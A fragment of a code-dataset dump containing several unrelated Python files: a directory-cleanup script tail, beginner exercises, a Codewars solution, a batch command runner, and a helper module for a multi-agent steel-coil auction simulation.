\")\n\n now = int(time.time())\n files = os.listdir(path)\n os.chdir(path)\n\n for a in files:\n if os.path.isfile(a):\n stat = os.stat(a)\n ctime = int(stat.st_ctime)\n diff = now - ctime\n if diff > seconds:\n if action == \"a\":\n archive(a)\n elif action ==\"ca\":\n compress(a)\n elif action == \"d\":\n delete(a)\n\n####################################################################\n\nif __name__ == '__main__':\n main()\n","repo_name":"BrunoGallant/dircleaner","sub_path":"dircleaner.py","file_name":"dircleaner.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"15789244222","text":"import math\nprint(math.e)\nprint(\"shiyanyou\")\nprint(\"shiyanlou's best\")\nprint('shiyanlou\\'s best')\n\nnumber = int(input(\"Enterr an interger: \"))\nif number <= 100:\n print(\"Your number is smaller than equal to 100\")\nelse:\n print(\"Your number is greater than 100\")\n\namount = float(input(\"Enter amount: \")) # input data\ninrate = float(input(\"Enter Interrest rate: \")) # input inrate\nperiod = int(input(\"Enter period: \")) # input period\nvalue = 0\nyear = 1\nwhile year <= period:\n value = amount + (inrate * amount)\n print(\"Year {} Rs. {:.2f}\".format(year, value))\n amount = value\n year = year + 1\n\nN = 10\nsum = 0\ncount = 0\nprint(\"Please input 10 numbers:\")\nwhile count < N:\n number = float(input())\n sum = sum + number\n count = count + 1\navg = sum / N\nprint(\"N = {}, Sum = {}\".format(N, sum))\nprint(\"Average = {:.2f}\".format(avg))\n\nfahrenheit = 0\nprint(\"Fahrenheit Celsius\")\nwhile fahrenheit <= 250:\n celsius = (fahrenheit - 32) / 1.8\n print(\"{:5d} {:7.2f}\".format(fahrenheit, celsius))\n fahrenheit = fahrenheit + 25\n\ndays = int(input(\"Enter days: \"))\nmonths = days // 30\ndays = days % 30\nprint(\"Months = {} Days = {}\".format(months, days))\ndays = int(input(\"Enter days: \"))\nprint(\"Months = {} Days = {}\".format(*divmod(days, 30)))\n\nN = 100\na = 2\nwhile a < N:\n print(str(a))\n a *= a\n\nsum = 0\nfor i in range(1, 11):\n sum += 1.0 / i;\n print(\"{:2d} {:6.4f}\".format(i, sum))\n\nimport math\ncircle_radius = 2\ncircle_square = circle_radius * circle_radius * math.pi\nprint(\"{:.10f}\".format(circle_square))\n\n","repo_name":"liljungege/PY_2018","sub_path":"PY_2018.08.04/PY_2018.08.04/PY_2018.08.04.py","file_name":"PY_2018.08.04.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"34860776635","text":"#Simplify the number!\n#https://www.codewars.com/kata/5800b6568f7ddad2c10000ae\n\ndef simplify(number):\n ans = []\n if number == 0:\n return ''\n\n num_as_str = str(number)\n num_length = len(num_as_str)\n for i in range(0, num_length):\n if int(num_as_str[i])>0:\n tens = 10**(num_length-i-1)\n if tens>1:\n ans.append(str(num_as_str[i]) + '*' + str(tens))\n else:\n ans.append(str(num_as_str[i]))\n\n return \"+\".join(ans)\n","repo_name":"WinrichSy/Codewars_Solutions","sub_path":"Python/6kyu/SimplifyTheNumber.py","file_name":"SimplifyTheNumber.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72471735841","text":"# -*- coding: utf-8 -*-\n\nimport argparse\nimport os\nimport subprocess\nimport sys\n\n# input\nparser = argparse.ArgumentParser()\nparser.add_argument('-in', dest=\"COMMANDS_FILE\", default=\"commands.txt\", help=\"Input text file 
where each line is a command\")\nparser.add_argument('-exclude', dest=\"IGNORE_LINES_STARTING_WITH\", default=\"#,//\", help=\"Ignore lines starting with this comma-separated list of characters\")\nparser.add_argument('-probe', dest=\"PROBE\", action=\"store_true\", help=\"Just print commands?\")\na = parser.parse_args()\n\nlines = []\nwith open(a.COMMANDS_FILE, 'r', encoding=\"utf8\") as f:\n lines = [line.strip() for line in f]\n lines = [line for line in lines if len(line) > 0]\n if len(a.IGNORE_LINES_STARTING_WITH) > 0:\n for string in a.IGNORE_LINES_STARTING_WITH.split(\",\"):\n lines = [line for line in lines if not line.startswith(string.strip())]\n\nfor command in lines:\n print('-------------------------------')\n print(command)\n if a.PROBE:\n continue\n finished = subprocess.check_call(command, shell=True)\n","repo_name":"beefoo/media-tools","sub_path":"run_commands.py","file_name":"run_commands.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"54"} +{"seq_id":"23885151554","text":"import pandas as pd\nimport os\nimport datetime\nfrom random import randrange\nfrom spade.message import Message\nimport math\nimport json\nfrom random import random\nimport numpy as np\nimport statistics as stats\nfrom datetime import timedelta,date\nimport subprocess\nimport time\n\n\ndef agents_data():\n agents_data_df = pd.read_csv(f'agents.csv', header=0, delimiter=\",\", engine='python')\n return agents_data_df\n\ndef auction_blank_df():\n \"\"\"Returns df column structure with all necessary information to evaluate auction performance\"\"\"\n df = pd.DataFrame([], columns=['agent_type', 'active_coils', 'auction_coils', 'fab_start', 'coil_ratings',\n 'pre_auction_duration', 'auction_duration'])\n\n '''df = pd.DataFrame([], columns=['id', 'agent_type', 'location_1', 'location_2', 'location',\n 'coil_auction_winner', 'coil_length', 'coil_width', 'coil_thickness', 'coil_weight',\n 'int_fab', 'bid', 'budget', 'ship_date', 'ship_date_rating',\n 'setup_speed',\n 'bid_rating', 'int_fab_priority', 'int_fab_rating', 'rating', 'rating_dif',\n 'negotiation',\n 'pre_auction_start', 'auction_start', 'auction_finish',\n 'active_tr_slot_1', 'active_tr_slot_2', 'tr_booking_confirmation_at', 'active_wh',\n 'wh_booking_confirmation_at', 'wh_location', 'active_coils', 'auction_coils',\n 'brAVG(tr_op_time)', 'brAVG(va_op_time)', 'AVG(tr_op_time)', 'AVG(va_op_time)',\n 'fab_start'\n 'slot_1_start', 'slot_1_end', 'slot_2_start', 'slot_2_end', 'delivered_to_wh',\n 'handling_cost_slot_1', 'handling_cost_slot_2',\n 'coil_ratings_1', 'coil_ratings_2',\n 'pre_auction_duration', 'auction_duration',\n 'gantt', 'location_diagram'\n ])'''\n return df\n\n\ndef browser_util(df):\n op_times_df = pd.DataFrame([], columns=['AVG(tr_op_time)', 'AVG(va_op_time)'])\n op_times_df.at[0, 'AVG(tr_op_time)'] = 72\n op_times_df.at[0, 'AVG(va_op_time)'] = 89\n\n sorted_df = df.sort_values(by=['time'])\n sorted_df = sorted_df.loc[df['status'] == \"on\"] # Solo los que estén activos\n active_time = 70\n sorted_df = sorted_df.loc[sorted_df['time'] < active_time]\n sorted_df = sorted_df.loc[:, ['location', 'id', 'From', 'agents']]\n sorted_df = sorted_df.drop_duplicates(subset=['id'])\n sorted_df = sorted_df.rename(columns={'id': 'agent'})\n sorted_df = sorted_df.reset_index(drop=True)\n for i in range(len(sorted_df['agent'])):\n slice = sorted_df.loc[i, 'agent'][:-3]\n if slice == 'coil_':\n sorted_df.at[i, 'agent_type'] = sorted_df.loc[i, 'agent'][:-4] # 
Crea otra columna con agent type\n elif slice == 'brow':\n sorted_df.at[i, 'agent_type'] = sorted_df.loc[i, 'agent']\n else:\n sorted_df.at[i, 'agent_type'] = sorted_df.loc[i, 'agent'][:-3]\n sorted_df = sorted_df.join(op_times_df)\n return sorted_df\n\ndef br_jid(agent_directory):\n \"\"\"Returns str with browser jid\"\"\"\n agents_df = agents_data()\n agents_df = agents_df.loc[agents_df['Name'] == \"browser\"]\n jid = agents_df['User name'].iloc[-1]\n return jid\n\ndef msg_to_br(msg_body, agent_directory):\n \"\"\"Returns msg object to send to browser agent\"\"\"\n agents_df = agents_data()\n agents_df = agents_df.loc[agents_df['Name'] == \"browser\"]\n jid = agents_df['User name'].iloc[-1]\n msg_br = Message(to=jid)\n msg_br.body = msg_body\n msg_br.set_metadata(\"performative\", \"inform\")\n return msg_br\n\ndef get_coil_list(browser_df, list):\n browser_df = browser_df.reset_index(drop=True)\n coil_df_nww = pd.DataFrame()\n for i in list:\n row_df = browser_df.loc[browser_df['location'] == i]\n coil_df_nww = coil_df_nww.append(row_df)\n coil_df_nww = coil_df_nww.sort_index()\n coil_df_nww = coil_df_nww.reset_index(drop=True)\n return coil_df_nww\n\ndef va_to_coils_initial_df(agent_df, conf_va_df):\n \"\"\"Builds df to send to coils with auction information made by agent_df and last plc temperatures\"\"\"\n agent_df.at[0, 'ancho'] = conf_va_df.loc[0, 'ancho']\n agent_df.at[0, 'largo'] = conf_va_df.loc[0, 'largo']\n agent_df.at[0, 'espesor'] = conf_va_df.loc[0, 'espesor']\n return agent_df\n\ndef conf_medidas(agent_df, configuracion_med):\n agent_df.at[0, 'ancho'] = configuracion_med.loc[0, 'ancho']\n agent_df.at[0, 'largo'] = configuracion_med.loc[0, 'largo']\n agent_df.at[0, 'espesor'] = configuracion_med.loc[0, 'espesor']\n return agent_df\n\ndef production_cost(configuracion_df,coil_df, i):\n z = coil_df.loc[i,'ancho'] - configuracion_df.loc[0,'ancho']\n m = coil_df.loc[i,'largo'] - configuracion_df.loc[0,'largo']\n n = coil_df.loc[i,'espesor'] - configuracion_df.loc[0,'espesor']\n cost = float(z * 4 + m * 2.5 + n * 2)\n return cost\n\ndef transport_cost(to):\n costes_df = pd.DataFrame()\n costes_df['From'] = ['NWW1', 'NWW1', 'NWW1','NWW1','NWW1','NWW3','NWW3','NWW3','NWW3','NWW3','NWW4','NWW4','NWW4','NWW4','NWW4']\n costes_df['CrossTransport'] = [24.6, 24.6, 0, 0, 55.6, 74.8, 74.8, 50.2, 50.2, 32.3, 71.5, 71.5, 46.9,46.9, 0]\n costes_df['Supply'] = [24.6, 24.6, 21.1, 21.1, 5.7, 24.6, 24.6, 21.1, 21.1, 5.7, 24.6, 24.6, 21.1, 21.1, 5.7]\n costes_df['To'] = ['va_08', 'va_09', 'va_10','va_11','va_12','va_08','va_09','va_10','va_11','va_12','va_08','va_09','va_10','va_11','va_12']\n costes_df = costes_df.loc[costes_df['To'] == to]\n costes_df = costes_df.reset_index(drop=True)\n return costes_df\n\ndef bid_evaluation(coil_msgs_df, va_data_df):\n key = []\n transport_cost_df = transport_cost(va_data_df.loc[0,'id'])\n for i in range(transport_cost_df.shape[0]):\n m = transport_cost_df.loc[i, 'CrossTransport']\n n = transport_cost_df.loc[i, 'Supply']\n key.append(n+m)\n transport_cost_df['transport_cost'] = key\n transport_cost_df = transport_cost_df.loc[:, ['From', 'To', 'transport_cost']]\n for i in range(coil_msgs_df.shape[0]):\n coil_msgs_df.at[i, 'production_cost'] = production_cost(va_data_df, coil_msgs_df, i)\n coil_msgs_df = coil_msgs_df.loc[:, ['From', 'id', 'agent_type', 'coil_jid', 'location', 'bid', 'production_cost', 'ancho', 'largo', 'espesor', 'ship_date', 'budget_remaining']]\n coil_msgs_df = coil_msgs_df.reset_index(drop=True)\n coil_msgs_df = 
coil_msgs_df.merge(transport_cost_df, on='From', sort=False)\n for i in range(coil_msgs_df.shape[0]):\n m = coil_msgs_df.loc[i, 'production_cost']\n n = coil_msgs_df.loc[i, 'transport_cost']\n coil_msgs_df.loc[i, 'minimum_price'] = m + n\n for i in range(coil_msgs_df.shape[0]):\n m = coil_msgs_df.loc[i, 'minimum_price']\n n = coil_msgs_df.loc[i, 'bid']\n coil_msgs_df.loc[i, 'difference'] = m - n\n results = coil_msgs_df.loc[:,['agent_type', 'id', 'coil_jid', 'bid', 'minimum_price', 'difference', 'ancho', 'largo', 'espesor', 'ship_date', 'budget_remaining']]\n results = results.sort_values(by=['difference'])\n results = results.reset_index(drop=True)\n value = []\n for i in range(results.shape[0]):\n value.append(i+1)\n results.insert(loc=0, column='position', value=value)\n return results\n\ndef counterbid_evaluation(coil_msgs_df, va_data_df):\n key = []\n transport_cost_df = transport_cost(va_data_df.loc[0,'id'])\n for i in range(transport_cost_df.shape[0]):\n m = transport_cost_df.loc[i, 'CrossTransport']\n n = transport_cost_df.loc[i, 'Supply']\n key.append(n + m)\n transport_cost_df['transport_cost'] = key\n transport_cost_df = transport_cost_df.loc[:, ['From', 'To', 'transport_cost']]\n for i in range(coil_msgs_df.shape[0]):\n coil_msgs_df.at[i, 'production_cost'] = production_cost(va_data_df, coil_msgs_df, i)\n coil_msgs_df = coil_msgs_df.loc[:, ['From', 'id', 'agent_type', 'coil_jid', 'location', 'counterbid', 'bid', 'production_cost', 'User_name_va', 'ancho', 'largo', 'espesor', 'budget_remaining', 'ship_date']]\n coil_msgs_df = coil_msgs_df.reset_index(drop=True)\n coil_msgs_df = coil_msgs_df.merge(transport_cost_df, on='From', sort=False)\n for i in range(coil_msgs_df.shape[0]):\n m = coil_msgs_df.loc[i, 'production_cost']\n n = coil_msgs_df.loc[i, 'transport_cost']\n coil_msgs_df.loc[i, 'minimum_price'] = m + n\n for i in range(coil_msgs_df.shape[0]):\n m = coil_msgs_df.loc[i, 'minimum_price']\n n = coil_msgs_df.loc[i, 'counterbid']\n coil_msgs_df.loc[i, 'profit'] = n - m\n results = coil_msgs_df.loc[:, ['agent_type', 'location', 'id', 'coil_jid', 'bid', 'counterbid', 'minimum_price', 'profit', 'User_name_va', 'ancho', 'largo', 'espesor', 'budget_remaining', 'ship_date']]\n results = results.sort_values(by=['profit'], ascending = False)\n results = results.reset_index(drop=True)\n value = []\n for i in range(results.shape[0]):\n value.append(i + 1)\n results.insert(loc=0, column='position', value=value)\n return results\n\ndef auction_kpis(va_data_df, auction_df, process_df, winner_df):\n df = auction_blank_df()\n #va\n df.at[0, 'purpose'] = 'inform'\n df.at[0, 'id_va'] = va_data_df.loc[0, 'id']\n df.at[0, 'accumulated_profit_va'] = va_data_df.loc[0, 'accumulated_profit']\n #coil_winner\n df.at[0, 'profit_va_auction'] = winner_df.loc[0, 'profit']\n df.at[0, 'id_winner_coil'] = winner_df.loc[0, 'id']\n df.at[0, 'coil_location_winner'] = winner_df.loc[0, 'location']\n df.at[0, 'minimum_price'] = winner_df.loc[0, 'minimum_price']\n df.at[0, 'bid_winner_coil'] = winner_df.loc[0, 'bid']\n df.at[0, 'counterbid_winner_coil'] = winner_df.loc[0, 'counterbid']\n df.at[0, 'budget_remaining_winner'] = winner_df.loc[0, 'budget_remaining']\n df.at[0, 'ship_date_winner'] = winner_df.loc[0, 'ship_date']\n df.at[0, 'coil_ancho_winner'] = winner_df.loc[0, 'ancho']\n df.at[0, 'coil_largo_winner'] = winner_df.loc[0, 'largo']\n df.at[0, 'coil_espesor_winner'] = winner_df.loc[0, 'espesor']\n\n df.at[0, 'pre_auction_start'] = auction_df.loc[0, 'pre_auction_start']\n df.at[0, 'pre_auction_duration'] = 
auction_df.loc[0, 'auction_start'] - auction_df.loc[0, 'pre_auction_start']\n df.at[0, 'auction_start'] = auction_df.loc[0, 'auction_start']\n df.at[0, 'auction_finish'] = datetime.datetime.now()\n df.at[0, 'auction_duration'] = df.loc[0, 'auction_finish'] - auction_df.loc[0, 'auction_start']\n df.at[0, 'fab_start'] = process_df['fab_start'].iloc[-1]\n df.at[0, 'fab_end'] = process_df['fab_end'].iloc[-1]\n df.at[0, 'time_wh'] = df.loc[0, 'fab_end'] + datetime.timedelta(seconds=30)\n\n df.at[0, 'active_coils'] = auction_df.loc[0, 'active_coils']\n df.at[0, 'auction_coils'] = auction_df.loc[0, 'auction_coils']\n df.at[0, 'active_coils'] = auction_df.loc[0, 'active_coils']\n df.at[0, 'number_preauction'] = auction_df.at[0, 'number_preauction']\n df.at[0, 'number_auction'] = auction_df.loc[0, 'number_auction']\n df.at[0, 'number_auction_completed'] = auction_df.loc[0, 'number_auction_completed']\n\n #df.at[0, 'coil_ratings_1'] = auction_df.loc[0, 'coil_ratings_1']\n df.at[0, 'coil_ratings'] = auction_df.loc[0, 'coil_ratings']\n\n #gantt_df = gantt(df)\n #df.at[0, 'gantt'] = gantt_df.to_dict()\n '''location_diagram_df = location_diagram(df)\n df.at[0, 'location_diagram'] = location_diagram_df.to_dict()'''\n return df\n\ndef gantt(auction_kpis_df):\n df = pd.DataFrame([], columns=['number_auction', 'task_id', 'task_name', 'duration', 'start', 'resource'])\n number = [auction_kpis_df.loc[0, 'number_auction_completed'], auction_kpis_df.loc[0, 'number_auction_completed'], auction_kpis_df.loc[0, 'number_auction_completed']]\n task_id = [1, 2, 3]\n task_name = ['pre_auction', 'auction', 'processing']\n duration = [auction_kpis_df.loc[0, 'pre_auction_duration'], auction_kpis_df.loc[0, 'auction_duration'], auction_kpis_df.loc[0, 'fab_end']-auction_kpis_df.loc[0, 'fab_start']]\n start = [auction_kpis_df.loc[0, 'pre_auction_start'], auction_kpis_df.loc[0, 'auction_start'], auction_kpis_df.loc[0, 'fab_start']]\n finish = [auction_kpis_df.loc[0, 'auction_start'], auction_kpis_df.loc[0, 'auction_finish'], auction_kpis_df.loc[0, 'fab_end']]\n resource = [auction_kpis_df.loc[0, 'active_coils'], auction_kpis_df.loc[0, 'auction_coils'], auction_kpis_df.loc[0, 'id_va']]\n\n df['number_auction'] = number\n df['task_id'] = task_id\n df['task_name'] = task_name\n df['duration'] = duration\n df['start'] = start\n df['finish'] = finish\n df['resource'] = resource\n\n print(\"GANTT: \\n\", df)\n return df\n\ndef change_agent(my_full_name, my_dir):\n df = pd.read_csv('agents.csv', header=0, delimiter=\",\", engine='python')\n df.loc[df.Name == my_full_name, 'Code'] = ''\n df.to_csv(f'{my_dir}''/''agents.csv', index=False, header=True)\n\ndef auction_entry(va_data_df, coil_df,number):\n dif_ancho = coil_df.loc[0,'ancho'] - va_data_df.loc[0, 'ancho']\n dif_largo = coil_df.loc[0, 'largo'] - va_data_df.loc[0, 'largo']\n dif_espesor = coil_df.loc[0, 'espesor'] - va_data_df.loc[0, 'espesor']\n dif_total = float(dif_ancho + dif_largo + dif_espesor)\n if (dif_total <= 250) or (number >= 5):\n if (va_data_df.loc[0, 'id'] == 'va_08' or va_data_df.loc[0, 'id'] == 'va_09') and (\n coil_df.loc[0, 'location'] == 'K'):\n answer = 1\n elif (va_data_df.loc[0, 'id'] == 'va_10' or va_data_df.loc[0, 'id'] == 'va_11') and (coil_df.loc[0, 'location'] == 'L'):\n answer = 1\n elif (va_data_df.loc[0, 'id'] == 'va_12') and (\n coil_df.loc[0, 'location'] == 'M' or coil_df.loc[0, 'location'] == 'N'):\n answer = 1\n else:\n answer = 0\n else:\n answer = 0\n return answer\n\ndef create_bid(coil_df, bid_mean):\n\n if coil_df.loc[0, 'number_auction'] 
<= 3:\n valor_1 = 0.16 * coil_df.loc[0, 'budget']\n elif coil_df.loc[0, 'number_auction'] > 3 and coil_df.loc[0, 'number_auction'] <= 7:\n valor_1 = 0.23 * coil_df.loc[0, 'budget']\n else:\n valor_1 = 0.4 * coil_df.loc[0, 'budget']\n \n if coil_df.loc[0, 'ship_date'] <= 10:\n valor_2 = 0.23 * coil_df.loc[0, 'budget']\n elif coil_df.loc[0, 'ship_date'] <= 16:\n valor_2 = 0.21 * coil_df.loc[0, 'budget']\n elif coil_df.loc[0, 'ship_date'] <= 25:\n valor_2 = 0.18 * coil_df.loc[0, 'budget']\n else:\n valor_2 = 0.16 * coil_df.loc[0, 'budget']\n \n oferta = 0.5 * bid_mean + valor_1 + valor_2\n \n if oferta > coil_df.loc[0, 'budget']:\n oferta = coil_df.loc[0, 'budget']\n return oferta\n\ndef create_counterbid(msg_va, coil_df):\n\n if msg_va.loc[0,'position'] <= 3:\n valor_1 = 0.7 * coil_df.loc[0, 'budget_remaining']\n else:\n valor_1 = 0.8 * coil_df.loc[0, 'budget_remaining']\n contraoferta = valor_1 + coil_df.loc[0, 'bid']\n return contraoferta\n\ndef compare_va(va_coil_msg_df, bid_register_df):\n\n va_coil_msg_df['winning_auction'] = va_coil_msg_df['counterbid']\n results = pd.concat([bid_register_df, va_coil_msg_df])\n results = results.sort_values(by=['winning_auction'])\n results = results.reset_index(drop=True)\n coil_name_winner = results.loc[0, 'User_name_va']\n return coil_name_winner\n\ndef va_msg_to(msg_body):\n \"\"\"Returns msg object without destination\"\"\"\n msg_tr = Message()\n msg_tr.body = msg_body\n msg_tr.set_metadata(\"performative\", \"inform\")\n return msg_tr\n\ndef msg_to_sender(received_msg):\n \"\"\"Returns msg to send without msg.body\"\"\"\n msg_reply = Message()\n msg_reply.to = str(received_msg.sender)\n msg_reply.set_metadata(\"performative\", \"inform\")\n return msg_reply\n\ndef process_df(df, coil_winner_df):\n process_df = df\n if pd.isnull(process_df['fab_start'].iloc[-1]):\n new_line_df = pd.Series(\n [np.nan, np.nan, np.nan, np.nan, np.nan, np.nan, np.nan, np.nan, np.nan],\n index=['fab_start', 'processing_time', 'start_auction_before', 'start_next_auction_at', 'fab_end',\n 'setup_speed', 'ancho', 'largo', 'espesor'])\n process_df = process_df.append(new_line_df, ignore_index=True)\n process_df = process_df.reset_index(drop=True)\n processing_time = 30 #600\n process_df['start_auction_before'].iloc[-1] = 1.5 * 60\n start_auction_before = process_df['start_auction_before'].iloc[-1]\n process_df['processing_time'].iloc[-1] = processing_time\n process_df['fab_start'].iloc[-1] = (datetime.datetime.now() + datetime.timedelta(minutes=5) - datetime.timedelta(minutes=2.5))\n process_df['fab_end'].iloc[-1] = process_df['fab_start'].iloc[-1] + datetime.timedelta(seconds=processing_time)\n start_next_auction_at = process_df['fab_end'].iloc[-1] - datetime.timedelta(seconds=start_auction_before)\n process_df['start_next_auction_at'].iloc[-1] = start_next_auction_at\n a = process_df['fab_start'].iloc[-1]\n else:\n process_df.loc[process_df.index.max() + 1, 'start_auction_before'] = \"\"\n processing_time = 100\n process_df['processing_time'].iloc[-1] = processing_time\n process_df['fab_start'].iloc[-1] = process_df['fab_end'].iloc[-2] #Empieza la última, cuando acaba la penúltima\n process_df['fab_start'] = pd.to_datetime(process_df['fab_start'])\n process_df['fab_end'].iloc[-1] = process_df['fab_start'].iloc[-1] + datetime.timedelta(seconds=processing_time)\n process_df['start_auction_before'].iloc[-1] = process_df['start_auction_before'].iloc[-2]\n start_next_auction_at = process_df['fab_end'].iloc[-1] - 
datetime.timedelta(seconds=process_df['start_auction_before'].iloc[-1])\n process_df['start_next_auction_at'].iloc[-1] = start_next_auction_at\n a = process_df['fab_start'].iloc[-1]\n process_df['ancho'].iloc[-1] = coil_winner_df.loc[0, 'ancho']\n process_df['largo'].iloc[-1] = coil_winner_df.loc[0, 'largo']\n process_df['espesor'].iloc[-1] = coil_winner_df.loc[0, 'espesor']\n return process_df\n\ndef my_full_name(agent_name, agent_number):\n decimal = \"\"\n if agent_name == \"coil\":\n if len(str(agent_number)) == 1:\n decimal = str(\"00\")\n elif len(str(agent_number)) == 2:\n decimal = str(0)\n full_name = str(agent_name) + str(\"_\") + decimal + str(agent_number)\n elif agent_name == \"log\":\n full_name = agent_name\n elif agent_name == \"browser\":\n full_name = agent_name\n elif agent_name == \"launcher\":\n full_name = agent_name\n else:\n if len(str(agent_number)) == 1:\n decimal = str(0)\n elif len(str(agent_number)) == 2:\n decimal = \"\"\n full_name = str(agent_name) + str(\"_\") + decimal + str(agent_number)\n return full_name\n\ndef set_agent_parameters_coil(my_dir, agent_name, agent_full_name, location, code):\n agent_data = pd.DataFrame([], columns=['id', 'agent_type','location', 'purpose', 'request_type', 'time', 'activation_time', 'int_fab'])\n agent_data.at[0, 'id'] = agent_full_name\n agent_data.at[0, 'agent_type'] = agent_name\n agents_df = agents_data()\n agents_df.loc[agents_df.Name == agent_full_name, 'location'] = location\n agents_df.loc[agents_df.Name == agent_full_name, 'Code'] = code\n agents_df.to_csv(f'{my_dir}''/''agents.csv', index=False, header=True)\n agents_df = agents_df.loc[agents_df['Name'] == agent_full_name]\n agents_df = agents_df.reset_index(drop=True)\n if agent_name == 'va':\n agent_data = agent_data.reindex(columns=['id', 'agent_type', 'purpose', 'request_type', 'time', 'activation_time', 'setup_speed', 'ancho', 'largo', 'espesor']) #Los valores ya existentes, se mantienen\n agent_data = va_parameters(agent_data, agents_df, agent_name)\n elif agent_name == \"coil\":\n agent_data = agent_data.reindex(\n columns=['id', 'agent_type', 'location', 'From', 'Code', 'purpose', 'request_type', 'time', 'activation_time', 'to_do', 'plant', 'number_auction', 'int_fab', 'bid', 'bid_status', 'ancho', 'largo', 'espesor', 'budget'])\n agent_data = coil_parameters(agent_data, agents_df, agent_name)\n else: #log,browser..\n agents_df = agents_data()\n df = agents_df.loc[agents_df['Name'] == agent_name]\n df = df.reset_index(drop=True)\n #agent_data.at[0, 'location'] = df.loc[0, 'Location']\n return agent_data\n\ndef set_agent_parameters(my_dir, agent_name, agent_full_name):\n agent_data = pd.DataFrame([], columns=['id', 'agent_type','location', 'purpose', 'request_type', 'time', 'activation_time', 'int_fab'])\n agent_data.at[0, 'id'] = agent_full_name\n agent_data.at[0, 'agent_type'] = agent_name\n agents_df = agents_data()\n agents_df = agents_df.loc[agents_df['Name'] == agent_full_name]\n agents_df = agents_df.reset_index(drop=True)\n if agent_name == 'va':\n agent_data = agent_data.reindex(columns=['id', 'agent_type', 'purpose', 'request_type', 'time', 'activation_time', 'setup_speed', 'ancho', 'largo', 'espesor']) #Los valores ya existentes, se mantienen\n agent_data = va_parameters(agent_data, agents_df, agent_name)\n elif agent_name == \"coil\":\n agent_data = agent_data.reindex(\n columns=['id', 'agent_type', 'location', 'From', 'Code', 'purpose', 'request_type', 'time', 'activation_time', 'to_do', 'plant', 'number_auction', 'int_fab', 'bid', 
'bid_status', 'ancho', 'largo', 'espesor', 'budget'])\n agent_data = coil_parameters(agent_data, agents_df, agent_name)\n else: #log,browser..\n agents_df = agents_data()\n df = agents_df.loc[agents_df['Name'] == agent_name]\n df = df.reset_index(drop=True)\n #agent_data.at[0, 'location'] = df.loc[0, 'Location']\n return agent_data\n\ndef agent_jid(agent_directory, agent_full_name):\n agents_df = agents_data()\n agents_df = agents_df.loc[agents_df['Name'] == agent_full_name]\n agents_df = agents_df.reset_index(drop=True)\n jid_direction = agents_df.loc[agents_df.Name == agent_full_name, 'User name']\n jid_direction = jid_direction.values\n jid_direction = jid_direction[0]\n return jid_direction\n\ndef agent_passwd(agent_directory, agent_full_name):\n agents_df = agents_data()\n agents_df = agents_df.loc[agents_df['Name'] == agent_full_name]\n password = agents_df['Password'].iloc[-1]\n return password\n\ndef coil_parameters(agent_data, agents_df, agent_name):\n \"\"\"Sets pseudo random parameters\"\"\"\n rn = random()\n agent_data.at[0, 'int_fab'] = 0\n agent_data.at[0, 'location'] = agents_df.loc[0, 'location']\n agent_data.loc[0, 'From'] = agents_df.loc[0, 'From']\n agent_data.loc[0, 'Code'] = agents_df.loc[0, 'Code']\n agent_data.loc[0, 'to_do'] = \"search_auction\"\n agent_data.loc[0, 'plant'] = \"VA\"\n agent_data.at[0, 'ancho'] = 12 + (rn * 10) # between 12-22\n agent_data.at[0, 'largo'] = 13 + (rn * 10) # between 13-16\n agent_data.at[0, 'espesor'] = 14 + (rn * 10) # between 14-17\n agent_data.at[0, 'ship_date'] = 1 + (rn * 40) # Planning: between now and 41\n agent_data.at[0, 'number_auction'] = 0 + (rn * 10) # 0 y 10\n if rn < 0.15:\n agent_data.at[0, 'budget'] = 200 + (20 * random())\n else:\n agent_data.at[0, 'budget'] = 200\n return agent_data\n\ndef random_date(start, end):\n \"\"\"\n This function will return a random datetime between two datetime\n objects.\n \"\"\"\n delta = end - start\n int_delta = (delta.days * 24 * 60 * 60) + delta.seconds\n random_second = randrange(int_delta)\n return start + timedelta(seconds=random_second)\n\ndef va_parameters(agent_data, agents_df, agent_name):\n \"\"\"Sets pseudo random parameters\"\"\"\n rn = random()\n agent_data.at[0, 'ancho'] = 5 + (rn * 10) # between 5-15\n agent_data.at[0, 'largo'] = 6 + (rn * 10) # between 6-16\n agent_data.at[0, 'espesor'] = 7 + (rn * 10) # between 7-17\n return agent_data\n\ndef bid_register(agent_name, agent_full_name):\n \"\"\"Creates bid register\"\"\"\n df = pd.DataFrame([], columns=['id', 'agent_type', 'auction_owner', 'initial_bid', 'second_bid', 'won_bid', 'accepted_bid'])\n #df.at[0, 'id'] = agent_full_name\n #df.at[0, 'agent_type'] = agent_name\n return df\n\ndef msg_to_log(msg_body, agent_directory):\n agents_df = agents_data()\n agents_df = agents_df.loc[agents_df['Name'] == \"log\"]\n log_jid = agents_df['User name'].iloc[-1]\n msg_log = Message(to=log_jid)\n msg_log.body = msg_body\n msg_log.set_metadata(\"performative\", \"inform\")\n return msg_log\n\ndef msg_to_log_2(msg_body, agent_directory):\n agents_df = agents_data()\n agents_df = agents_df.loc[agents_df['Name'] == \"log\"]\n log_jid = agents_df['User name'].iloc[-1]\n msg_log = Message(to=log_jid)\n print(f'msg_body:{msg_body}')\n msg_log.body = msg_body\n msg_log.set_metadata(\"performative\", \"inform\")\n return msg_log\n\ndef activation_df(agent_full_name, status_started_at, df, *args):\n act_df = df.loc[:, 'id':'activation_time']\n act_df = act_df.astype(str)\n act_df.at[0, 'purpose'] = \"inform\"\n act_df.at[0, 'request_type'] 
